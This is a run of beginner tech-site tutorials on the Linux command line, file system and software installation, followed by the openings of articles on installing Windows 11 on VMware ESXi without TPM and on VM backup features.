Another useful flag we can use with the 'kill' command is -HUP. This neat flag won't kill the process; instead, it forces it to reload its configuration. So, if you've got a service running and need to restart it because of changes made in its configuration file, then the -HUP flag will do just fine. Many people look at it as an alternative 'reload' command.

The complete syntax to make use of the flag is: kill -HUP pid where 'pid' is the process ID number you can obtain using the 'ps' command, just as we saw in the previous examples.

Chaining Commands, Redirecting Output, Piping

In Linux, you can chain groups of commands together with incredible ease. This is where the true power of the Linux command line lies: you use small tools, each of which does one little task and passes the output on to the next one.

For example, when you run the ps aux command, you might see a whole lot of output that you cannot read in one screen, so you can use the pipe symbol ( | ) to send the output of 'ps' to 'grep' which will search for a string in that output. This is known as 'piping' as it's similar to plumbing where you use a pipe to connect two things together.

linux-introduction-avd-cmd-line-6

Say you want to find the task 'antispam' : you can run ps aux | grep antispam . Ps 'pipes' its output to grep and it then searches for the string, showing you only the line with that text.

If you wanted ps to display one page at a time you can pipe the output of ps to either more or less . The advantage of less is that it allows you to scroll upwards as well. Try this: ps aux | less . Now you can use the cursors to scroll through the output, or use pageup, pagedown.

Alias

The 'alias' command is very neat, it lets you make a shortcut keyword for another longer command. Say you don't always want to type ps aux | less, you can create an alias for it.. we'll call our alias command 'pl'. So you type  alias pl='ps aux | less' .

Now whenever you type pl , it will actually run ps aux | less - neat, isn't it?

linux-introduction-avd-cmd-line-7

 

You can view the aliases that are currently set by typing alias:

linux-introduction-avd-cmd-line-8

As you can see, there are quite a few aliases already listed for the 'root' account we are using. You'll be surprised to know that most Linux distributions automatically create a number of aliases by default - these are there to make your life as easy as possible and can be deleted any time you wish.

Output Redirection

It's not uncommon to want to redirect the output of a command to a text file for further processing. In the good old DOS operating system, this was achieved by using the '>' operator. Even today, with the latest Windows operating systems, you would open a DOS command prompt and use the same method!

The good news is that Linux also supports these functions without much difference in the command line.

For example, if we wanted to store the listing of a directory into a file, we would type the following: ls > dirlist.txt:

linux-introduction-avd-cmd-line-9

As you can see, we've taken the output of 'ls' and redirected it to our file. Let's now take a look and see what has actually been stored in there by using the command cat dirlist.txt :

linux-introduction-avd-cmd-line-10

As expected, the dirlist.txt file contains the output of our previous command. So you might ask yourself 'what if I need to append the results?' - No problem here, as we've already got you covered.

When there's a need to append to a file or to previous results, as in DOS, we simply use the double '>>' operator, which appends the new output to the file specified in the command line:

linux-introduction-avd-cmd-line-11

The above example clearly shows the content of our file named 'document2' which is then appended to the previously created file 'dirlist.txt'. With the use of the 'cat' command, we are able to examine its contents and make sure the new data has been appended.

Note:

By default, the single > will overwrite the file if it exists, so if you give the ls > dirlist.txt command again, it will overwrite the first dirlist.txt. However, if you specify >> it will add the new output below the previous output in the file. This is known as output redirection.
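A quick terminal sketch summarising the difference, using the same example files as above:

$ ls > dirlist.txt                # creates dirlist.txt, overwriting it if it already exists
$ cat document2 >> dirlist.txt    # appends the contents of document2 to the end of dirlist.txt
$ cat dirlist.txt                 # view the combined result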

In DOS and Windows you normally issue one command at a time; in Linux, however, you can issue several commands in a single statement. For example, let's say we want to see the directory list, then delete all files ending with .txt, then see the directory list again.

This is possible in Linux using one statement as follows : ls -l; rm -f *.txt; ls -l . Basically you separate each command using a semicolon, ';'. Linux then runs all three commands one after the other. This is also known as command chaining.
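As a small side note (not shown in our screenshots), the shell also accepts '&&' as a separator. Unlike ';', it only runs the next command if the previous one succeeded - handy when a later step depends on an earlier one:

$ ls -l; rm -f *.txt; ls -l    # runs all three commands, one after the other, regardless of errors
$ cd /tmp && rm -f *.txt       # deletes the files only if the 'cd' actually succeeded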

Background Processes

If you append an ampersand '&' to the end of any command, it will run in the background and not disturb you. There is no equivalent for this in Windows, and it is very useful because it lets you start a long-running command in the background and carry on with other tasks while waiting for it to complete.

The only thing you have to keep in mind is that you will not see the output from the command on your screen since it is in the background, but we can redirect the output to a file the way we did two paragraphs above.

For example, if you want to search through all the files in a directory for the word 'Bombadil', but you want this task to run in the background and not interrupt you, you can type this: grep "Bombadil" *.* >> results.txt& . Notice that we've added the ampersand '&' character to the end of the command, so it will now run in the background and place the results in the file results.txt . When you press enter, you'll see something like this :

$ grep "Bombadil" *.* >> results.txt&

[1] 1272

linux-introduction-avd-cmd-line-12

Our screen shot confirms this. We created a few new files that contained the string 'Bombadil' and then gave the command grep "Bombadil" *.* >> results.txt& . The system accepted our command and placed the process in the background using PID (Process ID) 14976. When we next gave the 'ls' command to see the listing of our directory we saw our new file 'results.txt' which, as expected, contained the files and lines where our string was found.

If you run 'ps' while a complex command that takes some time to complete is executing in the background, you'll see that command in the list. Remember that you can use all the modifiers in this section with any combination of Linux commands; that's what makes it so powerful. You can take lots of simple commands and chain, pipe and redirect them in such a way that they do something complicated!
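As a closing sketch of how these pieces combine (the search string and filenames are simply the ones from our example), the following searches every file in the current directory in the background, appends any matching lines to a results file, and then pages through that file once the job has finished:

$ grep "Bombadil" *.* >> results.txt &    # search in the background, appending matches to results.txt
$ cat results.txt | less                  # page through the results afterwards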

Our next article covers Linux File & Folder Permissions, alternatively you can visit our Linux section for more linux related technical articles.

 




Installing Software On Linux

Installing software in Linux is very different from Windows for one very simple reason: most Linux programs come in 'source code' form. This allows you to modify any program (if you're a programmer) to suit your purposes! While this is incredibly powerful for a programmer, most of us are not programmers - we just want to start using the program!

Most programs will come 'zipped' just like they do in Windows, in other words they pack all the files together into one file and compress it to a more manageable size. Depending on the zipping program used, the method of unzipping may vary, however, each program will have step by step instructions on how to unpack it.

Most of the time the 'tar' program will be used to unpack a package and unzipping the program is fairly straightforward. This is initiated by typing 'tar -zxvf file-to-unzip.tgz' where 'file-to-unzip.tgz' is the actual filename you wish to unzip. We will explain the four popular options we've used (zxvf) but you can read the 'tar man' page if you are stuck or need more information.

As mentioned, the 'tar' program is used to unpack a package we've downloaded and would like to install. Because most packages use 'tar' to create one file for easy downloads, gzip (Linux's equivalent to the Winzip program) is used to compress the tar file (.gz), reducing the size and making it easier to transfer. This also explains the reason most files have extensions such as '.tgz' or '.tar.gz'.

To make life easy, instead of giving two commands to decompress (unzip) and unpack the package, we provide tar with the -z option to automatically unzip the package and then proceed with unpacking it (-x). Here are the options in greater detail:

-z : Unzip tar package before unpacking it.

-x : Extract/Unpack the package

-v : Verbosely list files processed

-f : use archive file (filename provided)
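Putting those options together, a typical unpacking session looks something like this - the package name is just a placeholder, so use the name of the file you actually downloaded:

$ tar -zxvf package-1.0.tar.gz    # unzip (-z) and extract (-x) the archive, listing files as it goes (-v -f)
$ cd package-1.0                  # most packages unpack into a directory named after themselves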

linux-introduction-installing-software-1

Because the list of files was long, we've cut the bottom part to make it fit in our small window.

Once you have unzipped the program, go into its directory and look for a file called INSTALL; most programs come with this file. It contains detailed instructions on how to install the program, including the necessary commands to be typed, depending on the Linux distribution you have. After you've got that out of the way, you're ready to use the three magic commands that install 99% of all software in Linux :)

Open the program directory and type ./configure. [1st magic command]

linux-introduction-installing-software-2

You'll see a whole lot of output that you may not understand; this is when the software you're installing is automatically checking your system to analyze the options that will work best. Unlike the Windows world, where programs are made to work on a very general computer, Linux programs automatically customize themselves to fit your system.

Think of it as the difference between buying ready-made clothes and having tailor made clothes especially designed for you. This is one of the most important reasons why programs are in the 'source code' form in Linux.

In some cases, the ./configure command will not succeed and will produce errors that will not allow you to take the next step and compile your program. In these cases, you must read the errors, fix any missing library files (the most common cause) or other problems, and try again:

linux-introduction-installing-software-3

As you can see, we've run into a few problems while trying to configure this program on our lab machine, so we looked for a different program that would work for the purpose of this demonstration!

linux-introduction-installing-software-4

 

This ./configure finished without any errors, so the next step is to type make. [2nd magic command]

linux-introduction-installing-software-5

This simple command will magically convert the source code into a usable program. The best analogy for this process is a recipe: the source code contains all the ingredients and, if you understand programming, you can change the ingredients to make the dish better. Typing the make command takes the ingredients and cooks the whole meal for you! This process is known as 'compiling' the program.

If make finishes successfully, you will want to put all the files into the right directories, for example, all the help files in the help files directory, all the configuration files in the /etc directory (covered in the pages that follow).

To perform this step, you have to log in as the superuser or 'root' account; if you don't know this password, you can't complete the installation.

Assuming you are logged in as root, type make install. [3rd magic command]

linux-introduction-installing-software-6

Lastly, once our program has been configured, compiled and installed in /usr/local/bin under the name 'bwm-ng', we are left with a whole bunch of extra files that are no longer useful. These can be cleaned up using the make clean command - but this, as you might have guessed, is not considered a magic command :)

linux-introduction-installing-software-7
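For reference, here is the whole sequence in one place - a minimal sketch assuming a package called 'package-1.0.tar.gz' that follows the usual configure/make conventions:

$ tar -zxvf package-1.0.tar.gz
$ cd package-1.0
$ ./configure         # 1st magic command: checks your system and prepares the build
$ make                # 2nd magic command: compiles the source code into a program
$ su                  # switch to the root account (you'll be asked for the root password)
# make install        # 3rd magic command: copies the finished program into place
# make clean          # optional: remove the leftover build files
# exit                # drop back to your normal user account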

 There, that's it!

Now here's the good news... that was the old hard way!

All the people involved with Linux realised that most people don't need to read the source code and change the program and don't want to compile programs, so there is now another way of distributing programs, known as the 'rpm' (Red Hat Package Manager) format.

This is one single file containing a pre-compiled program: you just have to double-click the rpm file (in the Linux graphical interface - X) and it will install the program on your system for you!

In the event that you find a program that is not compiling with 'make' you can search on the net (we recommend www.pbone.net ) for an rpm based on your Linux distribution and version. Installation then is simply one click away for the graphical X desktop, or one command away for the hardcore Linux enthusiasts!

Because the 'rpm' utility is quite complex with a lot of flags and options, we would highly recommend you read its 'man' page before attempting to use it to install a program.

One last note about rpm is that it will also check to see if there are any dependent programs or files that should or shouldn't be touched during an install or uninstall. By doing so, it is effectively protecting your operating system from accidentally overwriting or deleting a critical system file, causing a lot of problems later on!
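As a very small taste of the 'rpm' utility - read its man page before relying on it, and note that the package name below is only a placeholder:

# rpm -ivh package-1.0.i386.rpm    # install (-i) a package, verbosely (-v), with a progress bar (-h)
# rpm -qa | grep package           # query (-q) all (-a) installed packages and search for ours
# rpm -e package                   # erase (uninstall) the package

You normally need to be logged in as root to install or remove packages, which is why the prompts above are shown as '#'.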

For those looking for a challenge, our next article covers Advanced Linux Commands and explores the commands most used in the administration of the Linux operating system. Alternatively you can visit our Linux section to get access to a variety of Linux articles.


The Linux Command Line

Those who are already familiar with the topic could skip this whole section, but we highly recommend you read it because this is the heart of Linux. We also advise you to go through this section while sitting in front of the computer.

Most readers will be familiar with DOS in Windows and opening a DOS box. Well, let's put it this way: comparing the power of the Linux command line with the power of the DOS prompt is like comparing a Ferrari with a bicycle!

People may tell you that the Linux command line is difficult and full of commands to remember, but it's the same in DOS, and remember - you can get by in Linux without ever opening a command line (just as you can do all your work in Windows without ever opening a DOS box!). However, the Linux command line is actually very easy and logical, and once you have even the slightest fluency with it, you'll be amazed at how much faster you can do complicated tasks than you could with the fancy point-and-click graphics and mouse interface.

To give you an example, imagine the number of steps it would take you in Windows to find a file that has the word "hello" at the end of a line, open that file, remove the first ten lines, sort all the other lines alphabetically and then print it. In Linux, you could achieve this with a single command! - Have we got your attention yet?!
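Just to make the point concrete, here is one way such a one-liner might look - a rough sketch only, built from standard tools whose details you can find in their man pages:

$ grep -l "hello$" *.txt | head -1 | xargs cat | tail -n +11 | sort | lpr

Reading it left to right: grep -l lists the files containing a line that ends in 'hello', head -1 keeps the first of them, xargs cat prints its contents, tail -n +11 drops the first ten lines, sort puts the rest in alphabetical order and lpr sends the result to the printer.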

Though you might wonder what you could achieve by doing this - the point is that you can do incredibly complicated things by putting together small commands, exactly like using small building blocks to make a big structure.

We'll show you a few basic commands to move around the command line as well as their equivalents in Windows. We will first show you the commands in their basic form and then show you how you can see all the options to make them work in different ways.

The Basic Commands

As a rule, note that anything typed in 'single quotes and italics' is a valid Linux command to be typed at the command line, followed by Enter.

We will use this rule throughout all our tutorials to avoid confusion and mistakes. Do not type the quotes and remember that, unlike Windows, Linux is case sensitive, thus typing 'Document' is different from typing 'document'.

•  ls - You must have used the 'dir' command on Windows... well, this is like the 'dir' command on steroids! If you type 'ls' and press enter you will see the files in the current directory, and there are many useful options to change the output. For example, 'ls -l' will display the files along with details such as permissions (who can access a file), the owner of the file(s), date & time of creation, etc. The 'ls' command is probably the one command you will use more than any other on Linux. In fact, on most Linux systems you can just type 'dir' and get away with it, but you will miss out on the powerful options of the 'ls' command.

linux-introduction-cmd-line-1

 

•  cd - This is the same as the DOS command: it changes the directory you are working in. Suppose you are in the '/var/cache' directory and want to go to its subfolder 'samba' , you can type 'cd samba' just as you would if it were a DOS system.

linux-introduction-cmd-line-2

Imagine you were at the '/var/cache' directory and you wanted to change to the '/etc/init.d' directory in one step, you could just type 'cd /etc/init.d' as shown above. On the other hand, if you just type 'cd' and press enter, it will automatically take you back to your personal home directory (this is very useful as all your files are usually stored there).

We also should point out that while Windows and DOS use the well known back-slash ' \ ' in the full path address, Linux differentiates by using the forward-slash ' / '. This explains why we use the command 'cd /etc/init.d' and not 'cd \etc\init.d' as most Windows users would expect.

•  pwd - This will show you the directory you are currently in, should you forget. It's almost like asking the operating system 'Where am I right now ?'. It will show you the 'present working directory'.

linux-introduction-cmd-line-3

 

•  cp - This is the equivalent of the Windows 'copy' command. You use it to copy a file from one place to another. So if you want to copy a file called 'document' to another file called 'document1' , you would need to type 'cp document document1'. In other words, first the source, then the destination.

linux-introduction-cmd-line-4

The 'cp' command will also allow you to provide the path to copy to. For example, if you wanted to copy 'document' to the home directory of user1, you would type 'cp document /home/user1/'. If you want to copy something to your own home directory, you don't need to type the full path (e.g. /home/yourusername); you can use the shortcut '~' (tilde), so to copy 'document' to your home directory, you can simply type 'cp document ~'.
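A few quick variations on 'cp', using the same example names as above (user1 is assumed to exist on the system):

$ cp document document1       # copy 'document' to a new file called 'document1'
$ cp document /home/user1/    # copy it into user1's home directory
$ cp document ~               # copy it into your own home directory ('~' is the shortcut for it)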

 

•  rm - This is the same as the 'del' or 'delete' command in Windows. It will delete the files you specify. So if you need to delete a file named 'document', you type 'rm document'. The system will ask if you are sure, so you get a second chance! If you type 'rm -f' you will force (-f) the system to execute the command without asking for confirmation; this is useful when you have to delete a large number of files.

linux-introduction-cmd-line-5

In all Linux commands you can use the '*' wildcard that you use in Windows, so to delete all files ending with .txt in Windows you would type 'del *.txt' whereas in Linux you would type 'rm -f *.txt'. Remember, we used the '-f' flag because we don't want to be asked to confirm the deletion of each file.

linux-introduction-cmd-line-6

To delete a folder, you have to give rm the '-r' (recursive) option; as you might have already guessed, you can combine options like this: 'rm -rf mydirectory'. This will delete the directory 'mydirectory' (and any subdirectories within it) and will not ask you twice. Combining options like this works for all Linux commands.

 

•mkdir / rmdir - These two commands are the equivalent of Windows' 'md' and 'rd', which allow you to create (md) or remove (rd) a directory. So if you type 'mkdir firewall', a directory will be created named 'firewall'. On the other hand, type 'rmdir firewall' and the newly created directory will be deleted. We should also note that the 'rmdir' command will only remove an empty directory, so you might be better off using 'rm -rf' as described above.

linux-introduction-cmd-line-7

 

•mv - This is the same as the 'move' command on Windows. It works like the 'cp' or copy command, except that after the file is copied, the original source file is deleted. By the way, there is no rename command on Linux because technically moving and renaming a file is the same thing!

In this example, we recreated the 'firewall' directory we deleted previously and then tried renaming it to 'firewall-cx'. Lastly, the new directory was moved to the '/var' directory:

linux-introduction-cmd-line-8
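Written out, the steps from the screenshot look like this:

$ mkdir firewall               # recreate the directory we deleted earlier
$ mv firewall firewall-cx      # 'rename' it - really just a move to a new name
$ mv firewall-cx /var/         # move the renamed directory under /var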

That should be enough to let you move around the command line or the 'shell', as it's known in the Linux community. You'll be pleased to know that there are many ways to open a shell window from the ‘X' graphical desktop, which can be called an xterm, or a terminal window.

•  cat / more / less - These commands are used to view files containing text or code. Each command will allow you to perform a special function that is not available with the others so, depending on your work, some might be used more frequently than others.

The 'cat' command will show you the contents of any file you select. This command is usually used in conjunction with other advanced commands such as 'grep' to look for a specific string inside a large file which we'll be looking at later on.

When issued, the 'cat' command will run through the file without pausing until it reaches the end, just like a file scanner that examines the contents of a file while at the same time showing the output on your screen:

linux-introduction-cmd-line-9

In this example, we have a whopping 215KB text file containing the system's messages. We issued the 'cat messages' command and the file's contents were immediately listed on our screen; this went on for a minute until the 'cat' command reached the end of the file and exited.

Not much use for this example, but keep in mind that we usually pipe the output to other commands in order to give us some usable results :)

'more' is used in a similar way, but will pause the screen when it has filled with text, in which case we need to hit the space bar or enter key to continue scrolling per page or line. The 'up' or 'down' arrow keys are of no use for this command and will not allow you to scroll through the file - it's pretty much a one way scrolling direction (from the beginning to the end) with the choice of scrolling per page (space bar) or line (enter key).

The 'less' command is an enhanced version of 'more', and certainly more useful. With the less command, you are able to scroll up or down a file's content. To scroll down per page, you can make use of the space bar, or CTRL-D. To scroll upwards towards the beginning of the file, use CTRL-U.
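A quick sketch of the three commands side by side, using the system messages file from our example (on most systems it lives in /var/log and may require root access to read):

$ cat /var/log/messages     # dump the whole file to the screen without pausing
$ more /var/log/messages    # page forward through the file (space bar = next page, enter = next line)
$ less /var/log/messages    # scroll both ways with the arrow keys; press 'q' to quit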

It is not possible for us to cover all the commands and their options because there are thousands! However, we will teach you the secret to using Linux -- that is, how to find the right tool (command) for a job, and how to find help on how to use it.

Can I Have Some Help Please?

To find help on a command, you type the command name followed by '--help'. For example, to get help on the 'mkdir' command, you will type 'mkdir --help'. But there is a much more powerful way...

For those who read our previous section, remember we told you that Linux stores all files according to their function? Well Linux stores the manuals (help files) for every program installed, and the best part is that you can look up the 'man pages' (manuals) very easily. All the manuals are in the same format and show you every possible option for a command.

To open the manual of a particular command, type 'man' followed by the command name, so to open the manual for 'mkdir' type 'man mkdir':

linux-introduction-cmd-line-10

Interestingly, try getting help on the 'man' command itself by typing 'man man'. This is the most authoritative and comprehensive source of help for anything you have in Linux, and the best part is that every program will come with its manual! Isn't this so much better than trying to find a help file or readme.txt file :) ?

Here's another incredibly useful command -- if you know the task you want to perform, but don't know the command or program to use, use the 'apropos' command. This command will list all the programs on the system that are related to the task you want to perform. For example, say you want to send email but don't know the email program, you can type 'apropos email' and receive a list of all the commands and programs on the system that will handle email! There is no equivalent of this on Windows.

Searching for Files in Linux?

Another basic function of any operating system is knowing how to find or search for a missing or forgotten file, and if you have already asked yourself this question, you'll be pleased to find out the answer :)

The simplest way to find any file in Linux is to type 'locate' followed by the filename. So if you want to find a file called 'document' , you type 'locate document'. The locate command works using a database that is usually built when you are not using your Linux system, indexing all your files and directories to help you locate them.

You can use the more powerful 'find' command, but I would suggest you look at its 'man' page first by typing 'man find'. The 'find' command differs from the 'locate' command in that it does not use a database, but actually looks for the file(s) requested by scanning the whole directory or file system depending on where you execute the command.

Logically, the 'locate' command is much faster when looking for a file that has already been indexed in its database, but will fail to discover any new files that have just been installed since they haven't been indexed! This is where the 'find' command comes to the rescue!
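A short sketch contrasting the two commands (if locate's database has never been built on your system, it can be refreshed by running 'updatedb' as root - see 'man updatedb'):

$ locate document            # fast: searches the pre-built index for anything named 'document'
$ find / -name "document"    # slower: scans the whole file system from '/' for that exact name
$ find . -name "*.txt"       # search from the current directory for anything ending in .txt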

Our next article covers  Installing Software on Linux, alternatively you can head back to our Linux Section.

 


The Linux File System

A file system is nothing more than the way the computer stores and retrieves all your files. These files include your documents, programs, help files, games, music etc. In the Windows world we have the concept of files and folders.

A folder (also known as a directory) is nothing more than a container for different files so that you can organise them better. In Linux, the same concept holds true -- you have files, and you have folders in which you organise these files.

The difference is that Windows stores files in folders according to the program they belong to (in most cases), in other words, if you install a program in Windows, all associated files -- such as the .exe file that you run, the help files, configuration files, data files etc. go into the same folder. So if you install for example Winzip, all the files relating to it will go into one folder, usually c:\Program Files\Winzip.

In Linux however, files are stored based on the function they perform. In other words, all help files for all programs will go into one folder made just for help files, all the executable (.exe) files will go into one folder for executable programs, all programs configuration files will go into a folder meant for configuration files.

This layout has a few significant advantages as you always know where to look for a particular file. For example, if you want to find the configuration file for a program, you're bound to find it in the directory reserved for configuration files (/etc, covered below).

With the Windows operating system, it's highly likely the configuration file will be placed in the installation directory or some other Windows system subfolder. In addition, registry entries are something you won't be able to keep track of without the aid of a registry tracking program - something that does not exist in the Linux world since there is no registry!

Of course in Linux everything is configurable to the smallest level, so if you choose to install a program and store all its files in one folder, you can, but you will just complicate your own life and miss out on the benefits of a file system that groups files by the function they perform rather than arbitrarily.

Linux uses a hierarchical file system; in other words, there is no concept of 'drives' like c: or d:. Everything starts from what is called the '/' directory (known as the root directory). This is the topmost level of the file system and all folders are placed at some level from here. This is how it looks:

linux-introduction-file-system-1

 As a result of files being stored according to their function on any Linux system, you will see many of the same folders.

These are 'standard' folders that have been pre-designated for a particular purpose. For example the 'bin' directory will store all executable programs (the equivalent of Windows ‘.exe ' files).

Remember also that in Windows you access directories using a backslash (eg c:\Program Files) whereas in Linux you use a forward slash (eg: /bin ).

In other words you are telling the system where the directory is in relation to the root or top level folder.

So to access the cdrom directory according to the diagram on the left you would use the path /mnt/cdrom.

To access the home directory of user 'sahir' you would use /home/sahir.

 

 

 

 

So it's now time to read a bit about each directory function to help us get a better understanding of the operating system:

• bin - This directory is used to store the system's executable files. Most users are able to access this directory as it does not usually contain system critical files.

• etc - This folder stores the configuration files for the majority of services and programs run on the machine. These configuration files are all plain text files that you can open and edit the configuration of a program instantly. Network services such as samba (Windows networking), dhcp, http (apache web server) and many more, rely on this directory! You should be careful with any changes you make here.

• home - This is the directory in which every user on the system has his own personal folder for his own personal files. Think of it as similar to the 'My Documents' folder in Windows. We've created one user on our test system by the name of 'sahir' - When Sahir logs into the system, he'll have full access to his home directory.

• var - This directory is for any file whose contents change regularly, such as system log files - these are stored in /var/log. Temporary files that are created are stored in the directory /var/tmp.

• usr - This is used to store any files that are common to all users on the system. For example, if you have a collection of programs you want all users to access, you can put them in the directory /usr/bin. If you have a lot of wallpapers you want to share, they can go in /usr/wallpaper. You can create directories as you like.

• root - This can be confusing as we have a top level directory ‘/' which is also called ‘the root folder'.

The 'root' (/root) directory is like the 'My Documents' folder for a very special user on the system - the system's Administrator, equivalent to Windows 'Administrator' user account.

This account has access to any file on the system and can change any setting freely. Thus it is a very powerful account and should be used carefully. As a good practice, even if you are the system Administrator, you should not log in using the root account unless you have to make some configuration changes.

It is a better idea to create a 'normal' user account for your day-to-day tasks since the 'root' account is the account for which hackers always try to get the password on Linux systems because it gives them unlimited powers on the system. You can tell if you are logged in as the root account because your command prompt will have a hash '#' symbol in front, while other users normally have a dollar '$' symbol.

• mnt - We already told you that there are no concepts of 'drives' in Linux. So where do your other hard-disks (if you have any) as well as floppy and cdrom drives show up?

Well, they have to be 'mounted' or loaded for the system to see them. This directory is a good place to store all the 'mounted' devices. Taking a quick look at our diagram above, you can see we have mounted a cdrom device so it is showing in the /mnt directory. You can access the files on the cdrom by just going to this directory!

• dev - Every system has its devices, and the Linux O/S is no exception! All your system's devices, such as COM ports, parallel ports and others, exist in the /dev directory as files and directories! You'll hardly ever be required to deal with this directory, but you should be aware of what it contains.

• proc - Think of the /proc directory as a deluxe version of the Windows Task Manager. The /proc directory holds all the information about your system's processes and resources. Here again, everything exists as a file or directory, something that shouldn't surprise you by now!

By examining the appropriate files, you can see how much memory is being used, how many tcp/ip sessions are active on your system, get information about your CPU usage and much more. All programs displaying information about your system use this directory as their source of information!
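For example, the following files exist on virtually every Linux system, though their exact contents vary from machine to machine:

$ cat /proc/meminfo     # how much memory is installed and how it is currently being used
$ cat /proc/cpuinfo     # details about your CPU(s)
$ cat /proc/net/tcp     # a raw list of the system's TCP sessions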

• sbin - The /sbin directory's role is similar to that of the /bin directory we covered earlier, with the difference that it is only accessible to the 'root' user. The reason for this restriction, as you might have already guessed, is the sensitive applications it holds, which are generally used for the system's configuration and various other important services. Consider it an equivalent of the Windows Administrative Tools folder and you'll get the idea.

Lastly, if you've used a Linux system, you'll have noticed that not many files have an extension - that is, the three letters after the dot, as found in Windows and DOS: file1.txt , winword.exe , letter.doc.

While you can name your files with extensions, Linux doesn't really care about the 'type' of a file. There are very quick ways to instantly check what type of file something is, and you can even make just about any file in Linux an executable on a whim!

Linux is smart enough to recognise the purpose of a file so you don't need to remember the meaning of different extensions.

You have now covered the biggest hurdle faced by new Linux users. Once you get used to the file system you'll find it is a very well organised system that makes storing files a very logical process. There is a system and, as long as you follow it, you'll find most of your tasks are much simpler than in other operating systems. Our next article, The Linux Command Line, explores the Linux command line, commands, options and much more. Alternatively you can head back to our Linux section to find more technical articles covering the Linux operating system.


Why Use Linux?

The first question is - what are the benefits of using Linux instead of Windows? This is in fact a constant debate between the Windows and Linux communities and while we won't be taking either side, you'll discover that our points will favour the Linux operating system because they are valid :)

Of course, if you don't agree, our forums have a dedicated Linux section where we would happily discuss it with you!

Reasons for using Linux ....

While we could list a billion technical reasons, we will focus on those that we believe will affect you most:

•Linux is free. That's right - if you never knew it, the Linux operating system is free of charge. No user or server licenses are required*! If, however, you walk into an IT shop or bookstore, you will find various Linux distributions on the shelf available for purchase, that cost is purely to cover the packaging and possible support available for the distribution.

* We must note that the newer 'Advanced Linux Servers', now available from companies such as Redhat, actually charge a license fee because of the support and update services they provide for the operating system. In our opinion, these services are rightly charged since they are aimed at businesses that will use their operating system in critical environments where downtime and immediate support is non-negotiable.

•Linux is developed by hundreds of thousands of people worldwide. Because of this community development mode there are very fresh ideas going into the operating system and many more people to find glitches and bugs in the software than any commercial company could ever afford (yes, Microsoft included).

•Linux is rock solid and stable, unlike Windows, where just after you've typed a huge document it may suddenly crash, making you lose all your work!

Runtime errors and crashes are quite rare on the Linux operating system due to the way its kernel is designed and the way processes are allowed to access it. No one can guarantee that your Linux desktop or server will not crash at all, because that would be a bit extreme, however, we can say that it happens a lot less frequently in comparison with other operating systems such as Windows.

For the fanatics of the 'blue screen of death' - you'll be disappointed to find out there is no such thing in the world of Linux. However, not all is lost as there have been some really good 'blue screen of death' screen savers out for the Linux graphical X Windows system.

You could also say that evidence of the operating system's stability is the fact that it's the most widely used operating system for running important services in public or private sectors. Worldwide statistics show that the number of Linux web servers outweigh by far all other competitors:

linux-introduction-why-use-linux-1

Today, netcraft reports that for the month of June 2005, out of a total of 64,808,485 Web servers, 45,172,895 are powered by Apache while only 13,131,043 use Microsoft's IIS Web server!

•Linux is much more secure than Windows, there are almost no viruses for Linux and, because there are so many people working on Linux, whenever a bug is found, a fix is provided much more quickly than with Windows. Linux is much more difficult for hackers to break into as it has been designed from the ground up with security in mind.

•Linux uses fewer system resources than Windows. You don't need the latest, fastest computer to run Linux. In fact you can run a functional version of Linux from a floppy disk on a computer that is 5-6 years old! At this point, we can also mention that one of our lab firewalls still runs on a K6-266 3DNow! processor with 512 MB RAM! Of course, no graphical interfaces are loaded as we only work in CLI mode!

•Linux has been designed to put power into the hands of the user so that you have total control of the operating system and not the other way around. A person who knows how to use Linux has the computer far more 'by the horns' than any Windows user ever has.

•Linux is fully compatible with all other systems. Unlike Microsoft Windows, which is at its happiest when talking to other Microsoft products, Linux is not 'owned' by any company and thus it keeps its compatibility with all other systems. The simplest example of this is that a Windows computer cannot read files from a hard-disk with the Linux file system on it (ext2 & ext3), but Linux will happily read files from a hard-disk with the Windows file system (fat, fat32 or ntfs file system), or for that matter any other operating system.

Now that we've covered some of the benefits of using Linux, let's start actually focusing on the best way to ease your migration from the Microsoft world to the Linux world, or in case you already have a Linux server running - start unleashing its full potential!

The first thing we will go over is the way Linux deals with files and folders on the hard-disk as this is completely different to the way things are done in Windows and is usually one of the challenges faced by Linux newbies.

 



Install Windows 11 on VMware ESXi

Ultimate Guide: Install Windows 11 on VMware ESXi – Easily Bypass TPM Security Requirement

Windows 11 Installation on VMware ESXi

In this article, we'll show you how to set up or install Microsoft Windows 11 on VMware's ESXi servers and bypass the Trusted Platform Module version 2.0 (TPM 2.0) requirement. We've also made the TPM bypass ISO image available as a free download.

 


VMware ESXi – TPM – vTPM and Windows 11

Trusted Platform Module version 2.0 (TPM 2.0) is required to run Microsoft's Windows 11. This restricts the operating system's installation to newer PCs and means users with older hardware are likely to be forced to upgrade. While the virtualization world is often more forgiving when it comes to hardware requirements, trying to install Windows 11 on VMware's ESXi platform usually presents the error: "This PC can't run Windows 11":

Windows 11 Installation Error in VMware ESXi

Running Windows 11 as a virtual machine on VMware ESXi requires a virtual Trusted Platform Module (vTPM) to be present. For more details on Microsoft Windows 11 requirements see https://docs.microsoft.com/en-us/windows/whats-new/windows-11-requirements.

While VMware supports vTPM and doesn’t require a physical TPM 2.0 chip, to use it, you need to configure a number of different services, depending on your VMware Platform version, including vCenter, vSphere Native Key Provider and more, making it a complicated task – especially for those running home labs. For more details see, https://core.vmware.com/resource/windows-11-support-vsphere#section2.

The next steps will take you through downloading the TPM ISO image used to bypass the Windows TPM check.




8 Critical Features to Have in a VM Backup Solution

vm backup key features

Businesses that rely on virtual machines for their day-to-day operations should think seriously about securing their infrastructure. Modern use of virtual machines stems from the benefits of virtualization, which include accessibility, reduced operating costs, and flexibility, among others. But your virtual infrastructure becomes obsolete without proper security. One way to achieve that is through virtual machine backup and recovery solutions.

VM backups are crucial for maintaining business continuity. They help businesses prevent data loss and offer a failsafe if something happens to your Hyper-V or VMware virtual infrastructure. These services aren't uncommon. But knowing which one to choose depends on several factors. None are more important than the product's features, which directly impact your ability to keep the infrastructure running.

So that begs the question, what are the essential features of a VM backup software? That's exactly what this short guide focuses on. So, let's dive in.


Ransomware Protection

Ransomware attacks are making the rounds, and cybersecurity blogs and experts talk extensively about the potential damage these attacks can do. A ransomware attack can render your data unusable, locking it and demanding a ransom to release it. Therefore, it becomes a necessity to protect against potential ransomware attacks. Luckily, ransomware protection is a core feature of the V9 VM backup.

The feature makes it impossible for malicious software to tamper with the data on your virtual machines. Moreover, the ransomware data protection feature prevents any user, even with admin or root access, from modifying or deleting the backup data on your backup server. With this level of protection against devastating malware, businesses add another layer of security to their virtual environment.

Storage Saving With Augmented Inline Deduplication Technology

